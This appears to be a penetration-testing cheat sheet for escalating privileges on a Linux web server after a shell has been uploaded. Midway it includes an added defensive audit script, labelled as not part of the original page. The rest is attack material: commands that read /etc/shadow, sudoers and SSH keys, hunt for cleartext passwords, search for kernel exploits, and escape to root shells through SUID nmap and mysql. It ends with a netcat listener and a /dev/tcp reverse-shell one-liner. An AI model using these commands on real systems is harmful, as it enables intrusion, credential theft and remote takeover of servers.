Preparation for privilege escalation after uploading a shell to a website (Linux)
1. System/User info: uname -a, env, whoami, history, pwd
2. Who else has logged in? who, w, last
3. Are you in the sudoers file? sudo -l, cat /etc/sudoers
4. Other super users? grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'
5. Network info: ifconfig -a, netstat -antup, lsof -i
6. Check running processes: ps aux, ps -ef
7. List all versions: dpkg -l, httpd -V, mysql -V, python -V, ruby -v etc...
8. Determine if any have vulnerabilities: searchsploit
9. Password hashes? cat /etc/shadow
10. Check scheduled tasks: ls -la /etc/cron*
11. SSH keys? ls -la ~/.ssh/
12. Look for cleartext passwords in any file: find . -maxdepth 4 -type f | xargs grep -i "password"
$ uname -a
Linux linux 3.13 Ubuntu .....
$ searchsploit kernel 3.13 linux | sort -n
Linux Kernel 3.13 < 3.19 (Ubuntu 12.04/14) exploits/linux/local/37292.c
$ find / -perm -u=s -type f 2>/dev/null   # list SUID binaries, e.g. network utilities
$ nmap --interactive
nmap> !bash   (or !sh)
$ mysql -u USERNAME -pPASSWORD -h SERVER_IP -P MYSQL_PORT -D DATABASE_NAME
mysql> \! bash   (or \! ls -l, \! sh)
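Defensive counterpart to the checklist and SUID search above, as an added example that is not part of the original page: an audit an administrator can run to find extra UID 0 accounts, SUID copies of the shells and interpreters named here, and world-readable secrets. The function names and the flagged-binary list are assumptions of this example.

```sh
#!/bin/sh
# Added example: defensive audit of checklist items 3, 4, 9, 11 and the SUID
# search. Function names and the flagged-binary list are assumptions.

# Item 4: print accounts with UID 0 other than root from a passwd-format file.
extra_uid0() {
    grep -v -E '^#' "${1:-/etc/passwd}" |
        awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# SUID search: read SUID file paths on stdin and print those whose name is a
# shell, interpreter or tool with an interactive mode named on this page.
flag_suid() {
    while IFS= read -r path; do
        case "${path##*/}" in
            nmap|mysql|bash|sh|python*|ruby*) printf '%s\n' "$path" ;;
        esac
    done
}

# Items 3, 9 and 11: print the given secret files that are world-readable.
# Public keys (*.pub) are skipped; missing paths are ignored.
world_readable() {
    for f in "$@"; do
        [ -e "$f" ] || continue
        find "$f" -type f -perm -004 ! -name '*.pub' 2>/dev/null || true
    done
}

audit() {
    echo "== UID 0 accounts other than root =="
    extra_uid0 /etc/passwd
    echo "== SUID binaries to review (root filesystem only) =="
    find / -xdev -perm -u=s -type f 2>/dev/null | flag_suid
    echo "== World-readable secrets =="
    world_readable /etc/shadow /etc/sudoers "$HOME"/.ssh/id_*
}

# Run the full audit only when asked: sh audit.sh --run
if [ "${1:-}" = "--run" ]; then
    audit
fi
```

Any line printed under the three headings is a finding to fix: remove the extra UID 0 account, clear the SUID bit with chmod u-s, or tighten the file mode to 600.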
Reverse Shell:
local: nc -lvp 4445
remote: /bin/bash -i >& /dev/tcp/localIP/4445 0>&1